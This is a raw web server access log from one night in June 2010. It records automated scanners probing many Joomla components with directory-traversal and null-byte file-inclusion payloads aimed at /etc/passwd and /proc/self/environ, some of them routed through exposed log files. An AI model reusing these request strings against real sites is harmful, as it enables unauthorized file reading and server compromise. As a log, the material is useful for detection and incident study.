93.158.149.32 - - [24/Jun/2010:20:33:29 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:20:34:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:20:34:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:20:50:04 -0700] "GET /logs/access_100415.log/index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:20:50:04 -0700] "GET /index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:20:49:54 -0700] "GET /logs/index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:20:52:57 -0700] "GET /logs/index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:20:53:07 -0700] "GET /index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:20:53:31 -0700] "GET /logs/index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:20:53:41 -0700] "GET /logs/index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:20:53:31 -0700] "GET /index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:20:53:31 -0700] "GET /index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:20:53:58 -0700] "GET /logs/index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:20:53:58 -0700] "GET /index.php?option=com_loudmounth&Itemid=&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:20:54:54 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:20:55:04 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:04:39 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:04:28 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:04:28 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:04:29 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:04:29 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:04:39 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:04:31 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:04:31 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:07:38 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:07:38 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:07:39 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:07:39 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:07:41 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:07:41 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:08:00 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:08:00 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:08:07 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:08:07 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:08:45 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:08:35 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:08:45 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:08:36 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:08:49 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:08:49 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:09:30 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:21:09:20 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:09:41 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:09:52 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:09:50 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:09:50 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:09:57 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:09:57 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:11:52 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:11:43 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:11:51 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:11:52 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:12:28 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:12:18 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:14:47 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:14:47 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:14:57 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:14:53 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:14:53 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:15:03 -0700] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:15:31 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:15:31 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:16:14 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
95.156.233.139 - - [24/Jun/2010:21:16:15 -0700] "GET /logs/access_091203.log//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:16:30 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:16:20 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:16:30 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:16:20 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
110.137.115.135 - - [24/Jun/2010:21:29:38 -0700] "GET /logs/access_100520.log HTTP/1.1" 200 1048576 "http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.elfagr.net%2Flogs%2Faccess_100520.log&h=3ad7fiGxD1hnUdEjgtD6X_nqnBQ" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:33:29 -0700] "GET /logs/access_091126.log/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:33:40 -0700] "GET /logs/access_091126.log/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:33:30 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:33:30 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:33:30 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:33:30 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:34:01 -0700] "GET /logs/access_091126.log/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:34:01 -0700] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:21:34:02 -0700] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:37:05 -0700] "GET /logs/access_091126.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:36:55 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:36:55 -0700] "GET /logs////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:37:19 -0700] "GET /logs/access_091126.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:37:30 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:37:20 -0700] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:41:21 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:42:00 -0700] "GET /logs////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:41:50 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:42:39 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:43:21 -0700] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:21:43:21 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
64.57.240.235 - - [24/Jun/2010:21:58:02 -0700] "GET /logs/access.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
64.57.240.235 - - [24/Jun/2010:21:58:02 -0700] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
64.57.240.235 - - [24/Jun/2010:21:57:52 -0700] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
64.57.240.235 - - [24/Jun/2010:21:59:00 -0700] "GET /logs/access.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
64.57.240.235 - - [24/Jun/2010:21:59:00 -0700] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
64.57.240.235 - - [24/Jun/2010:21:59:00 -0700] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:22:08:16 -0700] "GET /logs/access.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:22:08:06 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:22:08:06 -0700] "GET /logs////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:22:10:04 -0700] "GET /logs/access.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:22:10:04 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.166.146 - - [24/Jun/2010:22:10:04 -0700] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:22:14:27 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:22:14:37 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:22:15:28 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:22:15:28 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:22:15:18 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:22:15:19 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:22:15:29 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:22:15:19 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:18:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:18:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:19:11 -0700] "GET /logs/access_091126.log/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:19:01 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:19:02 -0700] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.elfagr.net"
201.116.197.150 - - [24/Jun/2010:22:19:25 -0700] "GET /logs/access.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
201.116.197.150 - - [24/Jun/2010:22:19:25 -0700] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
201.116.197.150 - - [24/Jun/2010:22:19:25 -0700] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:21:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:21:22 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:21:27 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:26:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
